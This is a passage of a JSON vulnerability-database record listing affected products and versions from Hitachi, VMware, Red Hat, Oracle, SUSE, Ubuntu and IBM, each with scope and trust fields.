            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-03"
          },
          {
            "_id": null,
            "model": "cosminexus component container )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50"
          },
          {
            "_id": null,
            "model": "cosminexus component container )",
            "scope": "eq",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-00"
          },
          {
            "_id": null,
            "model": "cosminexus component container window",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "cosminexus component container",
            "scope": "ne",
            "trust": 0.6,
            "vendor": "hitachi",
            "version": "09-50-04"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "vcenter server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.5"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.1"
          },
          {
            "_id": null,
            "model": "vcenter orchestrator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.8.1"
          },
          {
            "_id": null,
            "model": "vcenter operations management suite",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "5.7.1"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "13.10"
          },
          {
            "_id": null,
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.10"
          },
          {
            "_id": null,
            "model": "linux lts",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "12.04"
          },
          {
            "_id": null,
            "model": "linux 10.04.lts",
            "scope": null,
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": null
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3 for vmware",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "linux enterprise server sp3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "11"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.54"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.33"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.32"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.31"
          },
          {
            "_id": null,
            "model": "internet sales",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sap",
            "version": "7.30"
          },
          {
            "_id": null,
            "model": "opensuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "12.3"
          },
          {
            "_id": null,
            "model": "jboss operations network",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.2.1"
          },
          {
            "_id": null,
            "model": "jboss operations network",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.2.0"
          },
          {
            "_id": null,
            "model": "jboss fuse service works",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "jboss fuse",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise web server el6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise web server el5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.2.1"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform el6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "jboss enterprise application platform el5",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "jboss brms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "jboss brms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "jboss bpms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "jboss bpms",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "jboss a-mq",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.0.0"
          },
          {
            "_id": null,
            "model": "fuse esb enterprise",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux workstation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux server optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux server eus 6.5.z",
            "scope": null,
            "trust": 0.3,
            "vendor": "redhat",
            "version": null
          },
          {
            "_id": null,
            "model": "enterprise linux server aus",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6.5"
          },
          {
            "_id": null,
            "model": "enterprise linux server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux hpc node",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop optional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "enterprise linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "6"
          },
          {
            "_id": null,
            "model": "weblogic portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.3.6.0"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.18.0"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.6.2"
          },
          {
            "_id": null,
            "model": "webcenter sites",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "11.1.1.6.1"
          },
          {
            "_id": null,
            "model": "retail returns management rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail returns management 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail returns management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "retail open commerce platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "retail central office rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail central office 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail central office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "retail back office rm2.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "14.0"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.4"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.3"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.2"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.1"
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "13.0"
          },
          {
            "_id": null,
            "model": "retail back office 12.0in",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "retail back office",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.0"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0.10"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.16"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.15"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.14"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3.13"
          },
          {
            "_id": null,
            "model": "mysql enterprise monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "health sciences empirica study",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.1.2.0"
          },
          {
            "_id": null,
            "model": "health sciences empirica signal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7.3.3.3"
          },
          {
            "_id": null,
            "model": "health sciences empirica inspections",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.0.1.0"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "7"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.2"
          },
          {
            "_id": null,
            "model": "enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2.2"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.1"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.0"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.4"
          },
          {
            "_id": null,
            "model": "endeca information discovery studio",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.3"
          },
          {
            "_id": null,
            "model": "communications service broker engineered system edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "communications service broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "communications service broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "12.1.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "10.4.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.9.1"
          },
          {
            "_id": null,
            "model": "communications policy management",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.7.3"
          },
          {
            "_id": null,
            "model": "communications online mediation controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "communications converged application server service controller",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2.1.00.10"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.3"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.1.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "4.0"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2.0.00.27"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "3.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.2"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.1"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "2.0"
          },
          {
            "_id": null,
            "model": "application express",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "1.5"
          },
          {
            "_id": null,
            "model": "application express 1.1-ea",
            "scope": null,
            "trust": 0.3,
            "vendor": "oracle",
            "version": null
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1x8664"
          },
          {
            "_id": null,
            "model": "business server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandriva",
            "version": "1"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere portal",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "websphere message broker for z/os",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere message broker",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.0"
          },
          {
            "_id": null,
            "model": "websphere lombardi edition",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1.0"
          },
          {
            "_id": null,
            "model": "websphere extended deployment compute grid",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0.0.0"
          },
          {
            "_id": null,
            "model": "websphere extended deployment compute",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "websphere dashboard framework",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "websphere business monitor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "websphere application server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.1"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.0.0"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.0"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0.1"
          },
          {
            "_id": null,
            "model": "web experience factory",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.0"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.3"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.2"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.0.1"
          },
          {
            "_id": null,
            "model": "urbancode release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.13"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.12"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.11"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0.1"
          },
          {
            "_id": null,
            "model": "urbancode deploy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.0"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1100"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1000"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4.1000"
          },
          {
            "_id": null,
            "model": "tivoli storage manager operations center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "6.4100"
          },
          {
            "_id": null,
            "model": "tivoli remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.1.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager for remote control",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2.1"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.2"
          },
          {
            "_id": null,
            "model": "tivoli endpoint manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "0"
          },
          {
            "_id": null,
            "model": "tivoli composite application manager for application diagnostics",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.1"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.5"
          },
          {
            "_id": null,
            "model": "tivoli asset discovery for distributed",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.2.0"
          },
          {
            "_id": null,
            "model": "tivoli application dependency discovery manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "7.2.21"
          },
          {
            "_id": null,
            "model": "support assistant",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.40"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.20"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.3.2"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.2.1"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.2.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.1.1"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.1.0"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.4.0.4"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.2.3"
          },
          {
            "_id": null,
            "model": "storwize unified software",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "v70001.3.0.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.7"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.6"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.5"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.2"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.1"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0.6"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.4.0"
          },
          {
            "_id": null,
            "model": "sterling secure proxy",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.3.01"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.41"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4.1"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.4"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.3"
          },
          {
            "_id": null,
            "model": "sterling control center",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "5.2"
          },
          {
            "_id": null,
            "model": "sametime proxy server and web client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "sametime proxy server and web client",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0.1"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "9.0.0"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2.1"
          },
          {
            "_id": null,
            "model": "sametime meeting server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "8.5.2"
          },
          {
            "_id": null,
            "model": "rational team concert",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0.5"
          },
          {
            "_id": null,
